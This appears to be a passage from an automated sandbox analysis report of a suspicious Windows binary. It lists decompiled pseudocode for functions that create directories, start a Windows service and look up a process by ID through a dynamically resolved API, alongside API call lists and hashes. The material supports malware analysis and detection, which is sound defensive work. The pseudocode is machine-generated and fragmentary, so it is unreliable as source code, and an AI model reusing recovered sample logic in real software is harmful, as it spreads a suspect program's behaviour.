				char* _t227;
				signed int _t231;
				signed int _t233;
				void* _t234;
				char* _t235;
				void* _t247;
				signed int _t255;

				_t211 = __edx;
				_push(0xffffffff);
				_push(E0043BB78);
				_push( *[fs:0x0]);
				_t235 = _t234 - 0x58;
				_t131 =  *0x44f5d0; // 0x8e7de579
				_t132 = _t131 ^ _t233;
				_v20 = _t132;
				_push(_t132);
				 *[fs:0x0] =  &_v16;
				_t214 = 0;
				_t134 = __edx;
				_v52 = 7;
				_v56 = 0;
				_v72 = 0;
				_t220 = __edx + 2;
				do {
					_t203 =  *_t134;
					_t134 = _t134 + 2;
				} while (_t203 != 0);
				E004044B0( &_v76, __edx, _t134 - _t220 >> 1);
				_v8 = 0;
				_t138 = _v56;
				_t222 = _t138 - 1;
				if(_t222 > _t138) {
					E00426095();
				}
				_t139 = _v72;
				if(_v52 < 8) {
					_t139 =  &_v72;
				}
				if( *((short*)(_t139 + _t222 * 2)) != 0x5c) {
					_t243 = (_t139 | 0xffffffff) - _v56 - 1;
					if((_t139 | 0xffffffff) - _v56 <= 1) {
						E00439257(8, _t214, _t222, _t243);
					}
					_t214 = _v56 + 1;
					if(E00404230( &_v76, 8, _t214) != 0) {
						_t193 = _v72;
						if(_v52 < 8) {
							_t193 =  &_v72;
						}
						_t203 = _v56;
						 *((short*)(_t193 + _t203 * 2)) = 0x5c;
						_t194 = _v72;
						_v56 = _t214;
						if(_v52 < 8) {
							_t194 =  &_v72;
						}
						 *((short*)(_t194 + _t214 * 2)) = 0;
					}
				}
				_t199 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v24 = 7;
				_v28 = 0;
				_v44 = 0;
				_v8 = 2;
				_t247 = 0 - _v56;
				_v80 = 0;
				if(_t247 >= 0) {
					L51:
					_t223 = _v92;
					if(_t223 > _v88) {
						E00426095();
					}
					_t200 =  &_v96;
					_v104 = _t200;
					while(1) {
						_t215 = _v88;
						_v100 = _t223;
						if(_v92 > _t215) {
							E00426095();
						}
						_t142 = 0;
						if(_t200 == 0 || _t200 !=  &_v96) {
							E00426095();
							_t142 = 0;
						}
						if(_t223 == _t215) {
							break;
						}
						_v80 =  *0x45082c();
						if(_t200 == 0) {
							E00426095();
						}
						if(_t223 >=  *((intOrPtr*)(_t200 + 8))) {
							E00426095();
						}
						if( *((intOrPtr*)(_t223 + 0x18)) < 8) {
							_t217 = _t223 + 4;
						} else {
							_t217 =  *(_t223 + 4);
						}
						if(_t217 == 0) {
							L76:
							_t154 = 0;
							__eflags = 0;
							goto L77;
						} else {
							_t161 = lstrlenW(_t217) + 1;
							if(_t161 > 0x3fffffff) {
								goto L76;
							}
							_t202 = _t161 + _t161;
							E004299F0(_t202);
							_t227 = _t235;
							if(_t227 == 0) {
								_t200 = _v104;
								_t223 = _v100;
								goto L76;
							}
							_t211 = _v80;
							 *_t227 = 0;
							_t164 = WideCharToMultiByte(_v80, 0, _t217, 0xffffffff, _t227, _t202, 0, 0);
							_t200 = _v104;
							asm("sbb eax, eax");
							_t154 =  ~_t164 & _t227;
							_t223 = _v100;
							L77:
							_t155 = CreateDirectoryA(_t154, 0);
							asm("sbb eax, eax");
							_v80 =  ~( ~_t155);
							if(_t223 >=  *((intOrPtr*)(_t200 + 8))) {
								E00426095();
							}
							_t223 = _t223 + 0x1c;
							continue;
						}
					}
					_v8 = 1;
					__eflags = _v24 - 8;
					if(__eflags >= 0) {
						_push(_v44);
						E0040A3F2(_t200, _t211, _t215, _t223, __eflags);
						_t235 =  &(_t235[4]);
						_t142 = 0;
						__eflags = 0;
					}
					_v8 = 0;
					_t224 = _v92;
					__eflags = _t224 - _t142;
					_v24 = 7;
					_v28 = _t142;
					_v44 = _t142;
					if(_t224 == _t142) {
						L89:
						_v8 = 0xffffffff;
						__eflags = _v52 - 8;
						_v92 = _t142;
						_v88 = _t142;
						_v84 = _t142;
						if(__eflags >= 0) {
							_push(_v72);
							E0040A3F2(_t200, _t211, _t215, _t224, __eflags);
						}
						 *[fs:0x0] = _v16;
						_pop(_t216);
						_pop(_t225);
						_pop(_t201);
						__eflags = _v20 ^ _t233;
						return E0042569C(_v80, _t201, _v20 ^ _t233, _t211, _t216, _t225);
					} else {
						_t215 = _v88;
						__eflags = _t224 - _t215;
						if(__eflags == 0) {
							L88:
							_t211 = _v92;
							_push(_v92);
							E0040A3F2(_t200, _v92, _t215, _t224, __eflags);
							_t235 =  &(_t235[4]);
							_t142 = 0;
							__eflags = 0;
							goto L89;
						}
						_t226 = _t224 + 0x18;
						__eflags = _t226;
						do {
							__eflags =  *_t226 - 8;
							if(__eflags >= 0) {
								_push( *((intOrPtr*)(_t226 - 0x14)));
								E0040A3F2(_t200, _t211, _t215, _t226, __eflags);
								_t235 =  &(_t235[4]);
								_t142 = 0;
								__eflags = 0;
							}
							 *_t226 = 7;
							 *((intOrPtr*)(_t226 - 4)) = _t142;
							 *((short*)(_t226 - 0x14)) = _t142;
							_t226 = _t226 + 0x1c;
							__eflags = _t226 - 0x18 - _t215;
						} while (__eflags != 0);
						goto L88;
					}
				} else {
					if(_t247 > 0) {
						E00426095();
					}
					do {
						_t169 = _v72;
						if(_v52 < 8) {
							_t169 =  &_v72;
						}
						if( *((short*)(_t169 + _t199 * 2)) == 0x5c) {
							E00403FD0( &_v96,  &_v48);
							_t203 = (_t203 | 0xffffffff) - _v28;
							__eflags = _t203 - 1;
							if(__eflags <= 0) {
								E00439257(_t199, _t214,  &_v96, __eflags);
							}
							_t231 = _v28 + 1;
							__eflags = _t231 - 0x7ffffffe;
							if(__eflags > 0) {
								E00439257(_t199, _t214, _t231, __eflags);
							}
							_t172 = _v24;
							__eflags = _t172 - _t231;
							if(_t172 >= _t231) {
								__eflags = _t231;
								if(__eflags != 0) {
									goto L43;
								}
								goto L67;
							} else {
								_t211 = _v28;
								E00404550( &_v48, _t231, _t211);
								__eflags = _t231;
								L43:
								if(__eflags <= 0) {
									goto L50;
								}
								_t174 = _v44;
								_t203 = 8;
								__eflags = _v24 - 8;
								if(__eflags < 0) {
									_t174 =  &_v44;
								}
								_t211 = _v28;
								 *((short*)(_t174 + _t211 * 2)) = 0x5c;
								goto L47;
							}
						} else {
							if(_t199 > _v56) {
								E00426095();
							}
							_t181 = _v72;
							if(_v52 < 8) {
								_t181 =  &_v72;
							}
							_t214 =  *(_t181 + _t199 * 2) & 0x0000ffff;
							_t211 = (_t211 | 0xffffffff) - _v28;
							_t252 = _t211 - 1;
							if(_t211 <= 1) {
								E00439257(_t199, _t214, 8, _t252);
							}
							_t231 = _v28 + 1;
							_t253 = _t231 - 0x7ffffffe;
							if(_t231 > 0x7ffffffe) {
								E00439257(_t199, _t214, _t231, _t253);
							}
							_t172 = _v24;
							if(_t172 >= _t231) {
								__eflags = _t231;
								if(__eflags != 0) {
									goto L31;
								}
								L67:
								__eflags = _t172 - 8;
								_t176 = _v44;
								_v28 = 0;
								if(__eflags < 0) {
									_t176 =  &_v44;
								}
								 *_t176 = 0;
							} else {
								_t203 =  &_v48;
								E00404550(_t203, _t231, _v28);
								_t255 = _t231;
								L31:
								if(_t255 <= 0) {
									goto L50;
								}
								_t182 = _v44;
								_t203 = 8;
								if(_v24 < 8) {
									_t182 =  &_v44;
								}
								_t211 = _v28;
								 *(_t182 + _t211 * 2) = _t214;
								L47:
								_t175 = _v44;
								_v28 = _t231;
								if(_v24 < _t203) {
									_t175 =  &_v44;
								}
								 *((short*)(_t175 + _t231 * 2)) = 0;
							}
						}
						L50:
						_t199 = _t199 + 1;
					} while (_t199 < _v56);
					goto L51;
				}
			}

APIs

std::_String_base::_Xlen.LIBCPMT ref: 0040266D
std::_String_base::_Xlen.LIBCPMT ref: 00402719
std::_String_base::_Xlen.LIBCPMT ref: 0040272C
std::_String_base::_Xlen.LIBCPMT ref: 00402787

Part of subcall function 00439257: __EH_prolog3.LIBCMT ref: 0043925E
Part of subcall function 00439257: __CxxThrowException@8.LIBCMT ref: 00439290

std::_String_base::_Xlen.LIBCPMT ref: 0040279A
lstrlenW.KERNEL32(00000002,?,?,8E7DE579), ref: 0040288B
__alloca_probe_16.LIBCMT ref: 004028A0
WideCharToMultiByte.KERNEL32(?,00000000,00000002,000000FF,?,?,00000000,00000000,?,?,8E7DE579), ref: 004028BD
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,8E7DE579), ref: 004028DC

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String_base::_Xlenstd::_$ByteCharCreateDirectoryException@8H_prolog3MultiThrowWide__alloca_probe_16lstrlen
String ID:
API String ID: 162299512-0
Opcode ID: 56f8b914e3aa5152048c9b0fb45f99786d0613024d31b182a03480364d697df3
Instruction ID: 6c3aabaa95c2ed9a07a0b726940fb06ed8fbb0d530e638e7903407dc94d2cf5a
Opcode Fuzzy Hash: 56f8b914e3aa5152048c9b0fb45f99786d0613024d31b182a03480364d697df3
Instruction Fuzzy Hash: D1C16D71D00219DBCF10EFA9CA88A9EF7B5BF04314F61462AE915B72C0D778AD44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00423109, Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00423109(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E00427279(E0043B406, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E0040E6CB(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E00405580(_t185, __eflags,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E004299F0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E004277B0(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E00422902(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E00405580(_t185, __eflags, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E004272D5(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E0040DF8F();
							goto L7;
						}
						E004299F0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x43fb38;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E00422E21(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E00422CB3(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E00422D09(_t195 - 0x58, _t185);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E0040DF8F();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M00423419))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E00422D09(_t179, _t185);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E0040DF8F();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E004249AE();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E004249AE();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E004249AE();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E004249AE();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E00405580(_t185, _t201, _t19) != 0) {
					E004299F0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E0040B11E(_t173, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00423110
lstrlenA.KERNEL32(00000000,000000FF,00000050,0041755D,00000000,00000001,?,?,000000FF,?,?,?), ref: 00423142
__alloca_probe_16.LIBCMT ref: 0042318B

Part of subcall function 0040B11E: _memcpy_s.LIBCMT ref: 0040B12E

__alloca_probe_16.LIBCMT ref: 00423202
_memset.LIBCMT ref: 00423212
__alloca_probe_16.LIBCMT ref: 0042323B
VariantClear.OLEAUT32(?), ref: 004232F1

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 68e3ec1e17bd010a137a8a8cbc4be135e49029e85f7d48c8b5e2552df9817b1f
Instruction ID: cee96bfb73986718a447d5758efde8c468f9b8f637a738395eafa8223aaac4d5
Opcode Fuzzy Hash: 68e3ec1e17bd010a137a8a8cbc4be135e49029e85f7d48c8b5e2552df9817b1f
Instruction Fuzzy Hash: B7A19E31E00229DBCF11DFA5E8856AEBBB0FF04315FA4415AE851A7291C73D9F42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004170C0, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004170C0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0042720D(E0043A700, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E00416D73(0x10);
						if(_t39 == 0) {
							_t65 = 0;
						} else {
							 *_t39 = 0x43f088;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E00416E8F( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							if( *(_t65 + 0xc) != 0) {
								_t41 = E00405670(_t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E00405670(_t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E00415804(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E004277B0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E004272B2(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 004170C7
EnterCriticalSection.KERNEL32(?,00000010,0041728B,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004170D8
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004170F6
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 0041712A
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00417196
_memset.LIBCMT ref: 004171B5
TlsSetValue.KERNEL32(?,00000000,00000000,8E7DE579), ref: 004171C6
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004171E7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 8b013b585f50a51322844018a7a8ee25958da09f41398ad72ac55dfa406c0ebf
Instruction ID: 920cc480fe0bab0eee336b10c92a0cd846a855f28dda31a9b11ff9cc248209af
Opcode Fuzzy Hash: 8b013b585f50a51322844018a7a8ee25958da09f41398ad72ac55dfa406c0ebf
Instruction Fuzzy Hash: 1F31AF71A04605BFDB20AF50D885CAABBB5FF04324B10C62FE55696660CB38AD90CF98

Uniqueness

Uniqueness Score: -1.00%

Function 10002EAC, Relevance: 13.6, APIs: 9, Instructions: 53
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10002EAC(char* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t4;
				void* _t7;
				void* _t14;
				void* _t15;

				_t4 = OpenSCManagerA(0, 0, 0xf003f);
				_t14 = _t4;
				if(_t14 != 0) {
					_t15 = OpenServiceA(_t14, _a4, 0xf01ff);
					if(_t15 == 0) {
						L9:
						_push(_t14);
						L10:
						CloseServiceHandle();
						L11:
						_t7 = 1;
						return _t7;
					}
					if(StartServiceA(_t15, 0, 0) != 0) {
						goto L11;
					}
					if(GetLastError() != 0x420) {
						while(QueryServiceStatus(_t15,  &_v32) != 0 && _v28 == 2) {
							Sleep(0x64);
						}
						CloseServiceHandle(_t15);
						goto L9;
					}
					CloseServiceHandle(_t14);
					_push(_t15);
					goto L10;
				}
				return _t4;
			}

0x10002ebd
0x10002ec3
0x10002ec7
0x10002ed8
0x10002edc
0x10002f2a
0x10002f2a
0x10002f2b
0x10002f2b
0x10002f31
0x10002f33
0x00000000
0x10002f33
0x10002eeb
0x00000000
0x00000000
0x10002ef8
0x10002f04
0x10002f1b
0x10002f1b
0x10002f24
0x00000000
0x10002f24
0x10002efb
0x10002f01
0x00000000
0x10002f01
0x10002f37

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10002EBD
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10002ED2
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10002EE3
GetLastError.KERNEL32 ref: 10002EED
CloseServiceHandle.ADVAPI32(00000000), ref: 10002EFB
QueryServiceStatus.ADVAPI32(00000000,?), ref: 10002F09
Sleep.KERNEL32(00000064), ref: 10002F1B
CloseServiceHandle.ADVAPI32(00000000), ref: 10002F24
CloseServiceHandle.ADVAPI32(00000000), ref: 10002F2B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ErrorLastManagerQuerySleepStartStatus
String ID:
API String ID: 191932718-0
Opcode ID: 312b2b25ba4947ae8c8503547aefb907aad1b2fc4abba084a123c66f45d2e183
Instruction ID: ea7a381575d3248d8e66227e30714413dd7bcbfb10bc35faa6ac1d8add82a416
Opcode Fuzzy Hash: 312b2b25ba4947ae8c8503547aefb907aad1b2fc4abba084a123c66f45d2e183
Instruction Fuzzy Hash: 46012531745227ABF325ABA08CC9B7E36BCFB057D5F200074FF05D4095D764860596A5

Uniqueness

Uniqueness Score: -1.00%

Function 10002673, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10002673(void* __eax, intOrPtr _a4) {
				void* _v8;
				_Unknown_base(*)()* _v12;
				signed int _v284;
				intOrPtr _v300;
				void* _v308;
				_Unknown_base(*)()* _t16;
				signed int _t37;
				signed int _t38;
				intOrPtr _t39;

				_t38 = _t37 | 0xffffffff;
				_t16 = GetProcAddress(LoadLibraryA("Kernel32.dll"), "CreateToolhelp32Snapshot");
				_v12 = _t16;
				if(_t16 != 0) {
					_v8 = _v12(2, 0);
					_v308 = 0x128;
					if(Process32First(_v8,  &_v308) != 0) {
						_t39 = _a4;
						while(_v300 != _t39) {
							if(Process32Next(_v8,  &_v308) != 0) {
								continue;
							}
							goto L8;
						}
						_t38 = _v284;
					}
				} else {
				}
				L8:
				return _t38;
			}

0x1000267f
0x10002697
0x1000269f
0x100026a2
0x100026b5
0x100026be
0x100026d3
0x100026d5
0x100026d8
0x100026f1
0x00000000
0x100026f3
0x00000000
0x100026f1
0x100026f9
0x100026f9
0x100026a4
0x100026a7
0x100026ff
0x10002705

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,00000000,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 1000268B
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10002697
Process32First.KERNEL32(00000000,?), ref: 100026CC
Process32Next.KERNEL32 ref: 100026EA

Strings

Kernel32.dll, xrefs: 10002686
CreateToolhelp32Snapshot, xrefs: 10002691
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000267C

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
